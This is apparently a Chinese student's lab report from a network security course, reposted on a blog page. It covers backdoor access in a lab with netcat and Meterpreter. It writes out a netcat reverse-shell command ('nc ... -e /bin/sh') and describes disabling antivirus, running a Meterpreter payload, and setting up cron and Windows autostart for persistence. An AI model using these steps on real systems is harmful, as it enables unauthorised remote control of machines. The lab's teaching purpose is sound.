20145313张雪纯网络攻防第二次实验

最新推荐文章于 2024-10-06 21:43:47 发布
最新推荐文章于 2024-10-06 21:43:47 发布
阅读量75 收藏
点赞数
文章标签: 操作系统 shell 运维
原文链接:http://www.cnblogs.com/entropy/p/6555263.html
版权

问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?
解压压缩文件时里面含有后门程序。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
通过捆绑其他文件、设置开机自启动、设置定时任务、自己误点等。
(3)Meterpreter有哪些给你映像深刻的功能?
有大量控制被控主机的功能。获取键盘输入可能导致密码泄露。
(4)如何发现自己有系统有没有被安装后门?
啊这个只好寄希望与杀毒软件和防火墙了。。。

后门的概念

一类恶意程序,能够使得攻击者获取电脑控制权限。
这次实验中用到的后门程序是netcat和meterpreter。

首先测试是否连接成功并查询ip地址

885194-20170315170233057-1510837018.png

使用netcat使Windows获得Linux Shell

注意:后门程序可以使用主动连接和反弹连接的方式,但是主动连接方式容易被防火墙拦截,所以大多使用反弹连接的方式,即被控方主动连接控制端。反弹连接是相关ip参数设置为控制方ip。

  • 在Windows中打开监听
    885194-20170315165900245-9781548.png
  • 在Linux中输入oot@KaliYL:/var/www/html# nc 192.168.20.175 8888 -e /bin/sh反弹连接Windows。

  • Windows获取Linux的shell,测试成功
    885194-20170315165809604-2022766136.png

    利用Meterpreter生成后门程序,使得Linux获得Windows的shell

  • 首先使用KiTTYPortable.exe生成后门程序。
    885194-20170315170316588-537060822.png

  • 把程序复制到Windows系统中。复制之前要先关闭杀毒软件以及防火墙,以防程序被杀。

  • 在Linux中启动msf
    885194-20170315170429916-74933461.png

  • 对msf进行基本配置,在Windows中双击运行后门程序,反弹连接至Linux
    885194-20170315170629588-472732177.png

  • 连接成功后获取Windows的shell
    885194-20170315170658729-143288386.png

  • 测试help命令
    885194-20170315170840791-425162619.png

  • 获取命令行界面
    885194-20170315170906854-854527800.png

  • 获取ruby交互界面
    885194-20170315170924057-565045502.png

  • 查询运行进程
    885194-20170315170939354-366691693.png

  • 尝试截屏
    885194-20170315170952823-1896397484.png

  • 查看post模块
    885194-20170315171019635-7226079.png

  • 检查被控机是否是虚拟机
    885194-20170315171036791-830171140.png

  • 导出密码(失败)
    885194-20170315171059604-1882277137.png

  • 尝试安装Meterpreter(Persistence)到目标机失败,没有成功的输出
    885194-20170315171124088-567921382.png

  • run metsvc不成功
    885194-20170315171146448-1461800800.png

天啦噜

  • 尝试提权显示环境不正确
    885194-20170315173825026-2084489167.png

设置后门程序自启动

  • 在Windows中设置后门启动
    885194-20170315171221557-2050754655.png

  • 使用crontab在Linux中设置自动执行定时任务,编辑方法和vim相同。
    885194-20170315171328588-2111845546.png

  • 查看已编辑的自动执行任务,每小时的20分即会执行。另一台主机持续侦听即可获取shell。
    885194-20170315171355885-1829346512.png

转载于:https://www.cnblogs.com/entropy/p/6555263.html

weixin_30845171
关注
20145313张雪纯《信息安全系统设计基础》第11周学习总结
weixin_30868855的博客
11-27 78
20145313张雪纯《信息安全系统设计基础》第11周学习总结 教材 异常控制流(ECF) 最简单的“平滑序列”类型的控制流是指PC中相邻的指令在存储器中也相邻。而异常控制流则是指程序变量表示的内部程序状态中的变化、系统状态的变化等突发情况使得控制系统做出的反映。 应用程序如何与操作系统实现交互。应用程序使用系统调用(system call)的ECF形式向操作系统请求服务;实现并发的基本机制;...
20145313张雪纯网络攻防第一次实验
weixin_30691871的博客
02-27 100
实验目的 本次实验用到的代码pwn1有两个函数foo、getShell。其中,foo的作用是简单回显用户输入的字符,getShell的作用是返回一个可用shell。程序正常运行时调用的是foo函数。在这次实验中,我们的目的是通过不同方式使得程序运行本不该运行的代码、调用getShell函数。 实验过程及原理 方法一 直接修改程序机器指令,改变程序执行流程 原程序的运行结果是回显用户输入字符,如图。...
20145313张雪纯MSF基础应用实验
weixin_30385925的博客
04-11 77
实验博客 ms08_067攻击实验 http://www.cnblogs.com/entropy/p/6690301.html ms11_050漏洞攻击 http://www.cnblogs.com/entropy/p/6693098.html Adobe漏洞攻击 http://www.cnblogs.com/entropy/p/6693120.html msf辅助模块的应用 http://ww...
20145313张雪纯信息搜集与漏洞扫描
weixin_30892889的博客
04-19 79
实验内容 各种搜索技巧的应用 DNS IP注册信息的查询 基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点 漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 问题回答 哪些组织负责DNS,IP的管理。 Internet 域名与地址管理机构(ICANN)是为承担域名系统管理,它设立三个支持组织,地址支持组织(ASO)负责IP地址系统的管理;域名支持组织(DNSO)负责互联...
20145313张雪纯exp7
weixin_30905981的博客
04-25 95
问题 (1)通常在什么场景下容易受到DNS spoof攻击 处于局域网中的时候,例如连接了学校/公司/餐厅wifi。 (2)在日常生活工作中如何防范以上两攻击方法 不要轻易点开未知网址、鼠标在链接处停留可有插件进行检测...对于dns欺骗,当我开启防火墙的时候是没有成功的..... 步骤 钓鱼网站 首先,查看80端口是否被占用 修改配置文件 打开stoolkit,依次选择社会攻...
20145313张雪纯恶意代码分析
weixin_30292843的博客
03-29 103
问题 如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。 想监控的有进程联网信息、修改注册表项、开机自启动信息等。 监控方法有设置任务计划,每日定时查看 并记录系统状态;使用wireshark进行实时抓包分析、使用sysmon工具进行实时监控等。 如果已经确定是某个程序或进程有问题,你有什么工具可以进一步...
20145313张雪纯Exp8 Web基础
weixin_30402343的博客
05-01 83
回答问题 (1)什么是表单 表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服务器上的CGI脚本或者取消输入,还可以用表单按钮来控制其他定义了处...
20145313张雪纯 《Java程序设计》第3周学习总结
weixin_30558305的博客
03-20 60
20145313张雪纯 《Java程序设计》第3周学习总结 教材学习内容总结 4.1.1 定义类 package four; class Clothes{ String color; char size; } public class ClassObject { public static void main(String[] args){ Clothes sun=new Clothes(); ...
鸿蒙开发(NEXT/API 12)【申请接入Wear Engine服务】 穿戴服务
鸿蒙的技术博客
09-30 830
申请Wear Engine服务前(开发者需实名认证为个人开发者或者企业开发者,认证前,请先了解二者的[权益区别] ),确认开发环境并完成创建项目、创建HarmonyOS应用等基本准备工作,再继续进行以下开发活动。
鸿蒙开发(NEXT/API 12)【访问控制&应用权限管控概述】程序访问控制
鸿蒙的技术博客
10-06 530
默认情况下,应用只能访问有限的系统资源。但某些情况下,应用存在扩展功能的诉求,需要访问额外的系统数据(包括用户个人数据)和功能,系统也必须以明确的方式对外提供接口来共享其数据或功能。
Linux嵌入式有发展吗,以及对uboot,kernel,rootfs的领悟
rjszcb的博客
09-30 814
上一份工作是2022,11—2023,11年底,汽车公司,底层修修改改,编译镜像,修改后,客户给东西,重新编译给他,客制化配置启动参数,环境,支持应用部门,不懂怎么使用某些驱动。uboot到底是干嘛的,想想,emmc的镜像文件是怎么被读到ddr的,emmc为啥可以被分区,烧录镜像,tftp网络命令为啥可以运行,启动设备时,为啥lcd可以看到图像,kernel还没启动,怎么出图像的。不管做应用开发,驱动开发也好,知道,系统原理,驱动框架,进程管理调度,内核竞争,信号,中断,锁,这些就够了。
【鸿蒙开发】探索HarmonyNext开发:常用注解详解与实战
一个不断前行的程序者
10-02 1330
本文介绍了HarmonyNext开发中一些常用的注解及其作用,并通过代码示例展示了如何在HarmonyOS应用开发中使用这些注解。注解为开发者提供了一种强大的代码组织和管理方式,有助于简化代码和提高开发效率。希望这些内容能够帮助您更好地理解和应用HarmonyNext的注解,为您的鸿蒙开发之旅增添助力。
白话进程>线程>协程
wendao76的专栏
10-06 620
进程、线程和协程是计算机科学中的基本概念,它们在操作系统和并发编程中扮演着重要角色。
windows下安装nginx和基本配置
weixin_48018877的博客
10-01 517
Nginx 的配置文件位于安装目录下的 conf 文件夹内,文件名为 nginx.conf。此时,Nginx 已经开始运行,可以通过访问 http://localhost 来确认 Nginx 是否启动成功。这里配置了Nginx监听80端口,并设置了网站的根目录为 html 文件夹,以及默认的首页文件名。安装 Nginx 实际上是解压下载的文件。可以选择一个适合的位置来存放 Nginx 的文件夹。并选择适合 Windows 的版本。从 Nginx 官方网站下载 Windows 版本的 Nginx。
【保姆级教程】UMLS工具——MetaMap安装及使用
Kakaxiii的博客
09-29 672
SPECIALIST 词典是一个大型的和词典,旨在提供 SPECIALIST 自然语言处理系统 (NLP) 所需的信息,其中包括 MetaMap 和词汇工具等。它旨在成为包含许多生物医学术语的通用英语词典。涵盖范围包括来自各种来源的常用英语单词和生物医学词汇。这每个词汇项目(单词或术语)的词典条目记录了 SPECIALIST NLP 系统所需的句法、形态(词形变化和派生)和正字法(拼写变体)信息。
Linux 进程的基本概念及描述
wxk2227814847的博客
10-01 1308
进程是操作系统中最重要的概念之一,理解它的基本概念和工作原理有助于更深入地掌握操作系统的运行机制。在Linux中,进程通过PCB和task_struct结构体来描述,进程的创建可以通过fork系统调用来实现。在后续的博客中,我们将继续探讨进程的调度和通信机制。
Linux驱动开发——LED驱动开发
一切皆是定数的博客
10-06 569
本文是学习rk3568开发板驱动开发的记录,代码依托于rk3568开发板。Linux下外设驱动,最终都是配置相应的硬件寄存器,本文中的LED灯驱动也是对rk3568的io口进行配置。
JavaEE 多线程第一节 (进程 线程 并行 并发 概念及关系)
最新发布
2301_80176774的博客
10-06 410
小白必看,一学就会
linux常用的命令
u012121721的博客
10-04 243
linux常用命令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值